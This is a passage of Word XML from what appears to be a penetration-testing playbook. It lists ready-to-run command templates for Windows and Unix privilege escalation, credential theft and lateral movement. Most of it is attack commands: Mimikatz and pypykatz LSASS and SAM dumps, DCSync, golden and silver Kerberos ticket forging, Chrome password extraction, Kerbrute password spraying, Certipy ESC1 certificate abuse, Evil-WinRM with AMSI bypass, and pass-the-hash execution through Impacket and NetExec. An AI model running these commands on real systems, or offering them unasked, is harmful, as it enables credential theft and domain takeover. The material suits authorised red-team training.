          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Missing KB patch enumeration for Windows privilege escalation.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Watson.exe &gt; /opt/tsec/output/5.9.1_watson.txt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Watson.exe &gt; /opt/tsec/output/5.9.2_watson_out.txt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CVEs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Watson.exe \| findstr 'CVE-2024\|CVE-2025\|CVE-2026' &gt; /opt/tsec/output/5.9.3_watson_recent.txt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Exploits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Watson.exe \| findstr 'Exploit: True' &gt; /opt/tsec/output/5.9.4_watson_public.txt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systeminfo \| findstr /B /C:'OS Name' /C:'OS Version' &amp;&amp; Watson.exe &gt; /opt/tsec/output/5.9.5_watson_os.txt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WES-NG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wes.py systeminfo.txt -e &gt; /opt/tsec/output/5.9.6_watson_wes.txt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Hotfix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systeminfo \| findstr 'Hotfix(s)' &gt; /opt/tsec/output/5.9.7_watson_hotfixes.txt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Watson.exe \| findstr '{kb_number}' &gt; /opt/tsec/output/5.9.8_watson_kb.txt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ExploitDB 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Watson.exe \| grep 'CVE' \| while read cve; do searchsploit $cve; done &gt; /opt/tsec/output/5.9.9_watson_exploitdb.txt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systeminfo &gt; /opt/tsec/output/5.9.10_watson_systeminfo.txt &amp;&amp; Watson.exe &gt; /opt/tsec/output/5.9.10_watson_assessment.txt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78"/>
    <w:bookmarkStart w:id="79" w:name="tool-5.10-sudo_killer"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 5.10 — SUDO_KILLER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Identify and exploit sudo misconfigurations on Unix-like systems.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./sudo_killer.sh -c -r /opt/tsec/output/5.10.1_sudokiller_report.txt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./sudo_killer.sh -c -e &gt; /opt/tsec/output/5.10.2_sudokiller_cve.txt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./sudo_killer.sh -c -i &gt; /opt/tsec/output/5.10.3_sudokiller_exploit.txt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Sudoers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./sudo_killer.sh -c -s &gt; /opt/tsec/output/5.10.4_sudokiller_sudoers.txt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./sudo_killer.sh -c -g &gt; /opt/tsec/output/5.10.5_sudokiller_env.txt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./sudo_killer.sh -v &gt; /opt/tsec/output/5.10.6_sudokiller_version.txt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Sudoers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./sudo_killer.sh -f {sudoers_file} -c &gt; /opt/tsec/output/5.10.7_sudokiller_custom.txt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LD_PRELOAD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./sudo_killer.sh -c -l &gt; /opt/tsec/output/5.10.8_sudokiller_ldpreload.txt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Wildcard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./sudo_killer.sh -c -w &gt; /opt/tsec/output/5.10.9_sudokiller_wildcard.txt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./sudo_killer.sh -c -e -i -s -g -w -r /opt/tsec/output/5.10.10_sudokiller_full.txt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91" w:name="phase-6-credential-access"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 6: Credential Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Steal credentials from target systems through memory dumping, keylogging, network sniffing, and Kerberos attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="81" w:name="tool-6.1-mimikatz"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 6.1 — Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">The iconic credential extraction tool for Windows.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Logon Passwords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mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit" &gt; /opt/tsec/output/6.1.1_mimikatz_passwords.txt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LSA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mimikatz "privilege::debug" "lsadump::lsa /patch" "exit" &gt; /opt/tsec/output/6.1.2_mimikatz_lsa.txt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mimikatz "privilege::debug" "lsadump::dcsync /domain:{domain} /user:{target_user}" "exit" &gt; /opt/tsec/output/6.1.3_mimikatz_dcsync_{target_user}.txt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mimikatz "privilege::debug" "lsadump::sam" "exit" &gt; /opt/tsec/output/6.1.4_mimikatz_sam.txt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Kerberos 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mimikatz "sekurlsa::tickets /export" "exit" &gt; /opt/tsec/output/6.1.5_mimikatz_tickets.txt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mimikatz "kerberos::golden /user:{user} /domain:{domain} /sid:{sid} /krbtgt:{hash} /id:500" "exit" &gt; /opt/tsec/output/6.1.6_mimikatz_golden.txt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mimikatz "kerberos::silver /user:{user} /domain:{domain} /sid:{sid} /target:{host} /service:{service} /rc4:{hash}" "exit" &gt; /opt/tsec/output/6.1.7_mimikatz_silver.txt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DPAPI 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mimikatz "dpapi::chrome /in:'%localappdata%\Google\Chrome\User Data\Default\Login Data'" "exit" &gt; /opt/tsec/output/6.1.8_mimikatz_dpapi.txt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Elevate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mimikatz "token::elevate" "exit" &gt; /opt/tsec/output/6.1.9_mimikatz_token.txt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Credential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mimikatz "privilege::debug" "sekurlsa::logonpasswords" "lsadump::lsa /inject /name:krbtgt" "exit" &gt; /opt/tsec/output/6.1.10_mimikatz_full.txt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81"/>
    <w:bookmarkStart w:id="82" w:name="tool-6.2-hashcat"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 6.2 — Hashcat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">The world’s fastest password recovery tool with GPU acceleration.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NTLM Crack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1000 -a 0 {hash_file} {wordlist} -o /opt/tsec/output/6.2.1_hashcat_ntlm.txt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 Brute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0 -a 3 {hash_file} '?a?a?a?a?a?a?a' -o /opt/tsec/output/6.2.2_hashcat_md5.txt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 Wordlist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1400 -a 0 {hash_file} {wordlist} -o /opt/tsec/output/6.2.3_hashcat_sha256.txt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NTLMv2 Crack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5600 -a 0 {hash_file} {wordlist} -o /opt/tsec/output/6.2.4_hashcat_netntlmv2.txt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3200 -a 0 {hash_file} {wordlist} -o /opt/tsec/output/6.2.5_hashcat_bcrypt.txt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1000 -a 3 {hash_file} '?u?l?l?l?l?d?d?s' -o /opt/tsec/output/6.2.6_hashcat_mask.txt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1000 -a 6 {hash_file} {wordlist} '?d?d?d?d' -o /opt/tsec/output/6.2.7_hashcat_hybrid.txt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1000 -a 0 {hash_file} {wordlist} -r {rules_file} -o /opt/tsec/output/6.2.8_hashcat_rules.txt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 Hash Crack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3000 -a 3 {hash_file} '?a?a?a?a?a?a?a' -o /opt/tsec/output/6.2.9_hashcat_lm.txt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1000 -a 0 {hash_file} {wordlist} -O -w 3 --force -o /opt/tsec/output/6.2.10_hashcat_full.txt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82"/>
    <w:bookmarkStart w:id="83" w:name="tool-6.3-secretsdump.py-impacket"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 6.3 — secretsdump.py (Impacket)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remotely dump SAM, LSA secrets, and NTDS.dit from Windows systems.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secretsdump.py {domain}/{user}:{password}@{target} &gt; /opt/tsec/output/6.3.1_secretsdump_sam_{target}.txt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DCSync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secretsdump.py {domain}/{user}:{password}@{dc_ip} -just-dc-ntlm &gt; /opt/tsec/output/6.3.2_secretsdump_dcsync_{dc}.txt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NTDS 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secretsdump.py -ntds {ntds_file} -system {system_hive} LOCAL &gt; /opt/tsec/output/6.3.3_secretsdump_ntds.txt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Hives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secretsdump.py -sam {sam_hive} -system {system_hive} LOCAL &gt; /opt/tsec/output/6.3.4_secretsdump_hives.txt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Pass-the-Hash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secretsdump.py -hashes {lmhash}:{nthash} {domain}/{user}@{target} &gt; /opt/tsec/output/6.3.5_secretsdump_pth_{target}.txt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VSS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secretsdump.py {domain}/{user}:{password}@{target} -use-vss &gt; /opt/tsec/output/6.3.6_secretsdump_vss_{target}.txt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Kerberos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secretsdump.py -k -no-pass {domain}/{user}@{target} &gt; /opt/tsec/output/6.3.7_secretsdump_kerb_{target}.txt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Hashes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secretsdump.py {domain}/{user}:{password}@{dc_ip} -history &gt; /opt/tsec/output/6.3.8_secretsdump_history_{dc}.txt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Targeted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secretsdump.py {domain}/{user}:{password}@{dc_ip} -just-dc-user {target_user} &gt; /opt/tsec/output/6.3.9_secretsdump_user_{target_user}.txt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Domain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secretsdump.py {domain}/{user}:{password}@{dc_ip} -just-dc-ntlm -history -pwd-last-set &gt; /opt/tsec/output/6.3.10_secretsdump_full_{dc}.txt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83"/>
    <w:bookmarkStart w:id="84" w:name="tool-6.4-john-the-ripper"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 6.4 — John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fast password cracker with extensive hash type support.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Detect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{hash_file} &gt; /opt/tsec/output/6.4.1_john_auto.txt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--wordlist={wordlist} {hash_file} &gt; /opt/tsec/output/6.4.2_john_wordlist.txt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--incremental {hash_file} &gt; /opt/tsec/output/6.4.3_john_incremental.txt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--wordlist={wordlist} --rules {hash_file} &gt; /opt/tsec/output/6.4.4_john_rules.txt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NTLM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--format=nt {hash_file} &gt; /opt/tsec/output/6.4.5_john_ntlm.txt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Cracked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--show {hash_file} &gt; /opt/tsec/output/6.4.6_john_show.txt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Acceleration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--format={format} --device=gpu {hash_file} &gt; /opt/tsec/output/6.4.7_john_gpu.txt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SHA512crypt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--format=sha512crypt {hash_file} &gt; /opt/tsec/output/6.4.8_john_sha512.txt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Resume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--restore={session_name} &gt; /opt/tsec/output/6.4.9_john_restore.txt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john --wordlist={wordlist} --rules --incremental {hash_file} &gt; /opt/tsec/output/6.4.10_john_full.txt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84"/>
    <w:bookmarkStart w:id="85" w:name="tool-6.5-lazagne"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 6.5 — LaZagne</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-platform credential recovery from local software stores.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lazagne all &gt; /opt/tsec/output/6.5.1_lazagne_all.txt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lazagne browsers &gt; /opt/tsec/output/6.5.2_lazagne_browsers.txt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Credential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lazagne windows &gt; /opt/tsec/output/6.5.3_lazagne_windows.txt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lazagne databases &gt; /opt/tsec/output/6.5.4_lazagne_databases.txt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Passwords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lazagne wifi &gt; /opt/tsec/output/6.5.5_lazagne_wifi.txt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lazagne git &gt; /opt/tsec/output/6.5.6_lazagne_git.txt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Chats &amp; Mails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lazagne chats mails &gt; /opt/tsec/output/6.5.7_lazagne_chats.txt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lazagne all -quiet -output /opt/tsec/output/6.5.8_lazagne_quiet.txt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lazagne browsers -firefox &gt; /opt/tsec/output/6.5.9_lazagne_firefox.txt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Credential Sweep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lazagne all -vv -output /opt/tsec/output/6.5.10_lazagne_full.txt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85"/>
    <w:bookmarkStart w:id="86" w:name="tool-6.6-pypykatz"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 6.6 — pypykatz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pure Python Mimikatz implementation for credential extraction.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LSASS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pypykatz lsa minidump {lsass.dmp} &gt; /opt/tsec/output/6.6.1_pypykatz_lsass.txt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pypykatz live lsa &gt; /opt/tsec/output/6.6.2_pypykatz_live.txt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Hives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pypykatz registry {system_hive} {sam_hive} &gt; /opt/tsec/output/6.6.3_pypykatz_sam.txt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Creds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pypykatz registry {security_hive} {system_hive} --json &gt; /opt/tsec/output/6.6.4_pypykatz_cached.json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DPAPI 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pypykatz dpapi minidump {lsass.dmp} &gt; /opt/tsec/output/6.6.5_pypykatz_dpapi.txt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Kerberos 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pypykatz kerberos minidump {lsass.dmp} &gt; /opt/tsec/output/6.6.6_pypykatz_kerberos.txt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LSA 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pypykatz registry {security_hive} --lsa-secret &gt; /opt/tsec/output/6.6.7_pypykatz_lsa.txt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pypykatz lsa minidump {dump} -o json &gt; /opt/tsec/output/6.6.8_pypykatz.json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pypykatz dpapi backupkeys {security_hive} &gt; /opt/tsec/output/6.6.9_pypykatz_backup.txt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pypykatz lsa minidump {lsass.dmp} &amp;&amp; pypykatz dpapi minidump {lsass.dmp} &gt; /opt/tsec/output/6.6.10_pypykatz_full.txt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86"/>
    <w:bookmarkStart w:id="87" w:name="tool-6.7-kerbrute"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 6.7 — Kerbrute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberos pre-authentication brute-forcing and user enumeration.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kerbrute userenum --dc {dc_ip} -d {domain} {userlist} -o /opt/tsec/output/6.7.1_kerbrute_enum.txt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Spray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kerbrute passwordspray --dc {dc_ip} -d {domain} {userlist} {password} -o /opt/tsec/output/6.7.2_kerbrute_spray.txt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kerbrute bruteuser --dc {dc_ip} -d {domain} {wordlist} {username} -o /opt/tsec/output/6.7.3_kerbrute_brute.txt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AS-REP Roast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kerbrute userenum --dc {dc_ip} -d {domain} {userlist} 2&gt;&amp;1 \| grep 'no pre-auth' &gt; /opt/tsec/output/6.7.4_kerbrute_asrep.txt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Spray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kerbrute passwordspray --dc {dc_ip} -d {domain} {userlist} {pass} -t 1 -o /opt/tsec/output/6.7.5_kerbrute_safe.txt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KDC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kerbrute userenum --kdc {kdc_host} -d {domain} {userlist} -o /opt/tsec/output/6.7.6_kerbrute_kdc.txt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kerbrute userenum --dc {dc_ip} -d {domain} {userlist} -o /opt/tsec/output/6.7.7_kerbrute.json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kerbrute passwordspray --dc {dc_ip} -d {domain} {userlist} {pass} --delay 5 -o /opt/tsec/output/6.7.8_kerbrute_delay.txt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Downgrade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kerbrute userenum --dc {dc_ip} -d {domain} {userlist} --downgrade -o /opt/tsec/output/6.7.9_kerbrute_downgrade.txt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Domain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kerbrute userenum --dc {dc_ip} -d {domain} {userlist} -o /opt/tsec/output/6.7.10_kerbrute_audit.txt &amp;&amp; kerbrute passwordspray --dc {dc_ip} -d {domain} {userlist} {pass}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87"/>
    <w:bookmarkStart w:id="88" w:name="tool-6.8-rubeus"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 6.8 — Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">C# toolset for raw Kerberos interaction and abuse.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Kerberoast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Rubeus.exe kerberoast /format:hashcat /outfile:/opt/tsec/output/6.8.1_rubeus_kerberoast.txt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AS-REP Roast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Rubeus.exe asreproast /format:hashcat /outfile:/opt/tsec/output/6.8.2_rubeus_asrep.txt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Rubeus.exe dump /service:krbtgt /outfile:/opt/tsec/output/6.8.3_rubeus_tickets.txt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the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Rubeus.exe ptt /ticket:{ticket_kirbi} &gt; /opt/tsec/output/6.8.4_rubeus_ptt.txt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Rubeus.exe golden /user:{user} /domain:{domain} /sid:{sid} /krbtgt:{hash} /ptt &gt; /opt/tsec/output/6.8.5_rubeus_golden.txt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Rubeus.exe silver /user:{user} /domain:{domain} /sid:{sid} /target:{host} /service:cifs /rc4:{hash} /ptt &gt; /opt/tsec/output/6.8.6_rubeus_silver.txt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TGT Renewal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Rubeus.exe renew /ticket:{tgt_kirbi} /ptt &gt; /opt/tsec/output/6.8.7_rubeus_renew.txt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S4U Abuse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Rubeus.exe s4u /user:{user} /rc4:{hash} /impersonateuser:admin /msdsspn:http/{host} /ptt &gt; /opt/tsec/output/6.8.8_rubeus_s4u.txt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Rubeus.exe brute /password:{password} /noticket &gt; /opt/tsec/output/6.8.9_rubeus_brute.txt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Kerberos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Rubeus.exe kerberoast /format:hashcat &amp;&amp; Rubeus.exe asreproast /format:hashcat &amp;&amp; Rubeus.exe dump &gt; /opt/tsec/output/6.8.10_rubeus_full.txt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88"/>
    <w:bookmarkStart w:id="89" w:name="tool-6.9-certipy"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 6.9 — Certipy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Active Directory Certificate Services enumeration and abuse.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certipy find -u {user}@{domain} -p {password} -dc-ip {dc_ip} -output /opt/tsec/output/6.9.1_certipy_ca.json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certipy find -u {user}@{domain} -p {password} -dc-ip {dc_ip} -vulnerable -output /opt/tsec/output/6.9.2_certipy_vuln.json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ESC1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certipy req -u {user}@{domain} -p {password} -dc-ip {dc_ip} -ca {ca} -template {template} -upn administrator -output /opt/tsec/output/6.9.3_certipy_esc1.json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ESC8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certipy relay -target http://{ca}/certsrv/certfnsh.asp -ca {ca} &gt; /opt/tsec/output/6.9.4_certipy_esc8.txt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certipy auth -pfx {cert}.pfx -dc-ip {dc_ip} &gt; /opt/tsec/output/6.9.5_certipy_auth.txt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ESC11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certipy find -u {user}@{domain} -p {password} -dc-ip {dc_ip} -scheme ldaps -output /opt/tsec/output/6.9.6_certipy_esc11.json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Abuse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certipy req -u {user}@{domain} -p {password} -dc-ip {dc_ip} -ca {ca} -template {template} -on-behalf-of {domain}\\{target_user} -pfx {cert}.pfx &gt; /opt/tsec/output/6.9.7_certipy_abuse.txt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BloodHound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certipy find -u {user}@{domain} -p {password} -dc-ip {dc_ip} -old-bloodhound -output /opt/tsec/output/6.9.8_certipy_bloodhound.json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certipy shadow auto -u {user}@{domain} -p {password} -dc-ip {dc_ip} -account {target} &gt; /opt/tsec/output/6.9.9_certipy_shadow.txt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ADCS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certipy find -u {user}@{domain} -p {password} -dc-ip {dc_ip} -vulnerable -json -output /opt/tsec/output/6.9.10_certipy_full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89"/>
    <w:bookmarkStart w:id="90" w:name="tool-6.10-netexec-nxc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 6.10 — NetExec (NXC)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Network execution tool for credential validation and AD testing.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Spray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&gt; /opt/tsec/output/6.10.1_nxc_spray.txt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--sam &gt; /opt/tsec/output/6.10.2_nxc_sam.txt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LSA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--lsa &gt; /opt/tsec/output/6.10.3_nxc_lsa.txt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NTDS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{dc} -u {user} -p {password} --ntds drsuapi &gt; /opt/tsec/output/6.10.4_nxc_ntds.txt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Pass-the-Hash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-H {nthash} &gt; /opt/tsec/output/6.10.5_nxc_pth.txt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DPAPI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--dpapi cookies &gt; /opt/tsec/output/6.10.6_nxc_dpapi.txt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Mimikatz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-M mimikatz &gt; /opt/tsec/output/6.10.7_nxc_mimikatz.txt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LSassy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-M lsassy &gt; /opt/tsec/output/6.10.8_nxc_lsassy.txt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--sam --json &gt; /opt/tsec/output/6.10.9_nxc.json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Harvest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--sam --lsa --dpapi cookies -M mimikatz -M lsassy &gt; /opt/tsec/output/6.10.10_nxc_full.txt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102" w:name="phase-7-lateral-movement"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 7: Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Move through the target environment by compromising additional systems using legitimate credentials and protocol abuse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="92" w:name="tool-7.1-evil-winrm"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 7.1 — Evil-WinRM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ultimate WinRM shell for Windows remote management exploitation.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Connection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evil-winrm -i {target_ip} -u {username} -p {password} &gt; /opt/tsec/output/7.1.1_evilwinrm_{target_ip}.txt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evil-winrm -i {target_ip} -u {username} -H {ntlm_hash} &gt; /opt/tsec/output/7.1.2_evilwinrm_hash_{target_ip}.txt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Connection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evil-winrm -i {target_ip} -u {username} -p {password} -S &gt; /opt/tsec/output/7.1.3_evilwinrm_ssl_{target_ip}.txt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evil-winrm -i {target_ip} -c {cert_pem} -k {key_pem} &gt; /opt/tsec/output/7.1.4_evilwinrm_cert_{target_ip}.txt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evil-winrm -i {target_ip} -u {username} -p {password} -s {local_file} -d {remote_path} &gt; /opt/tsec/output/7.1.5_evilwinrm_upload_{target_ip}.txt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evil-winrm -i {target_ip} -u {username} -p {password} -s {ps1_script} &gt; /opt/tsec/output/7.1.6_evilwinrm_script_{target_ip}.txt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AMSI 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evil-winrm -i {target_ip} -u {username} -p {password} -a &gt; /opt/tsec/output/7.1.7_evilwinrm_amsi_{target_ip}.txt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evil-winrm -i {target_ip} -u {username} -p {password} -c "Get-Service \| Where-Object {\$_.Status -eq 'Running'}" &gt; /opt/tsec/output/7.1.8_evilwinrm_services_{target_ip}.txt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evil-winrm -i {target_ip} -u {username} -p {password} &gt; /opt/tsec/output/7.1.9_evilwinrm_menu_{target_ip}.txt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evil-winrm -i {target_ip} -u {username} -p {password} -S -a -s {ps_script} &gt; /opt/tsec/output/7.1.10_evilwinrm_full_{target_ip}.txt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92"/>
    <w:bookmarkStart w:id="93" w:name="tool-7.2-netexec-nxc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 7.2 — NetExec (NXC)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-protocol network exploitation for SMB, WinRM, LDAP, MSSQL, SSH.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-x 'whoami' &gt; /opt/tsec/output/7.2.1_nxc_smbcmd_{target}.txt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 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-X 'Get-Process' &gt; /opt/tsec/output/7.2.2_nxc_ps_{target}.txt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Pass-the-Hash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-H {hash} -x 'whoami' &gt; /opt/tsec/output/7.2.3_nxc_pth_{target}.txt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WinRM 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winrm {targets} -u {user} -p {password} -x 'hostname' &gt; /opt/tsec/output/7.2.4_nxc_winrm_{target}.txt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MSSQL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mssql {targets} -u {user} -p {password} -x 'whoami' &gt; /opt/tsec/output/7.2.5_nxc_mssql_{target}.txt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 Shares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-M spider_plus &gt; /opt/tsec/output/7.2.6_nxc_spider_{target}.txt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WMI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--wmi 'SELECT * FROM Win32_Process' &gt; /opt/tsec/output/7.2.7_nxc_wmi_{target}.txt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--local-auth &gt; /opt/tsec/output/7.2.8_nxc_local_{target}.txt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Kerberos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{targets} -u {user} -p {password} -k --use-kcache &gt; /opt/tsec/output/7.2.9_nxc_kerb_{target}.txt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Sweep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nxc smb {cidr} -u {user} -p {password} -x 'whoami' --continue-on-success &gt; /opt/tsec/output/7.2.10_nxc_sweep.txt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93"/>
    <w:bookmarkStart w:id="94" w:name="tool-7.3-impacket-suite"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 7.3 — Impacket Suite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Python network protocol classes for lateral movement.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SMBExec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smbexec.py {domain}/{user}:{password}@{target} &gt; /opt/tsec/output/7.3.1_impacket_smbexec_{target}.txt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WMIExec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wmiexec.py {domain}/{user}:{password}@{target} &gt; /opt/tsec/output/7.3.2_impacket_wmiexec_{target}.txt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psexec.py {domain}/{user}:{password}@{target} &gt; /opt/tsec/output/7.3.3_impacket_psexec_{target}.txt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ldapdomaindump -u {domain}\\{user} -p {password} {dc_ip} -o /opt/tsec/output/7.3.4_impacket_ldap_{dc_ip}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Pass-the-Hash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wmiexec.py -hashes {lmhash}:{nthash} {domain}/{user}@{target} &gt; /opt/tsec/output/7.3.5_impacket_pth_{target}.txt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NTLM Relay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-tf {targets_file} -smb2support -c 'whoami' &gt; /opt/tsec/output/7.3.6_impacket_relay.txt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Lookupsid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lookupsid.py {domain}/{user}:{password}@{target} &gt; /opt/tsec/output/7.3.7_impacket_lookupsid_{target}.txt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atexec.py {domain}/{user}:{password}@{target} 'whoami' &gt; /opt/tsec/output/7.3.8_impacket_atexec_{target}.txt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Dcomexec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dcomexec.py {domain}/{user}:{password}@{target} &gt; /opt/tsec/output/7.3.9_impacket_dcomexec_{target}.txt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Protocol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wmiexec.py {creds}@{target} &amp;&amp; smbexec.py {creds}@{target} &amp;&amp; psexec.py {creds}@{target} &gt; /opt/tsec/output/7.3.10_impacket_full_{target}.txt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94"/>
    <w:bookmarkStart w:id="95" w:name="tool-7.4-bloodhound"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 7.4 — BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Graph-based Active Directory attack path analysis.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SharpHound.exe -c All --zipfilename /opt/tsec/output/7.4.1_bloodhound_{domain}.zip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SharpHound.exe -c DCOnly --zipfilename /opt/tsec/output/7.4.2_bloodhound_dconly_{domain}.zip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SharpHound.exe -c Session --zipfilename /opt/tsec/output/7.4.3_bloodhound_session_{domain}.zip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SharpHound.exe -c ACL --zipfilename /opt/tsec/output/7.4.4_bloodhound_acl_{domain}.zip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Collector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bloodhound.py -u {user} -p {password} -d {domain} -c All -o /opt/tsec/output/7.4.5_bloodhound_py_{domain}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SharpHound.exe --loop --loopduration 01:00:00 --zipfilename /opt/tsec/output/7.4.6_bloodhound_loop_{domain}.zip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SharpHound.exe -c Trusts --zipfilename /opt/tsec/output/7.4.7_bloodhound_trusts_{domain}.zip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SharpHound.exe -c GPOLocalGroup --zipfilename /opt/tsec/output/7.4.8_bloodhound_gpo_{domain}.zip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SharpHound.exe -c DCOnly,Session --exclude-dc {dc_name} --zipfilename /opt/tsec/output/7.4.9_bloodhound_stealth_{domain}.zip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SharpHound.exe -c All --collectallproperties --zipfilename /opt/tsec/output/7.4.10_bloodhound_full_{domain}.zip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</w:tbl>
    <w:bookmarkEnd w:id="95"/>
    <w:bookmarkStart w:id="96" w:name="tool-7.5-psexec-sysinternals"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 7.5 — PsExec (Sysinternals)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
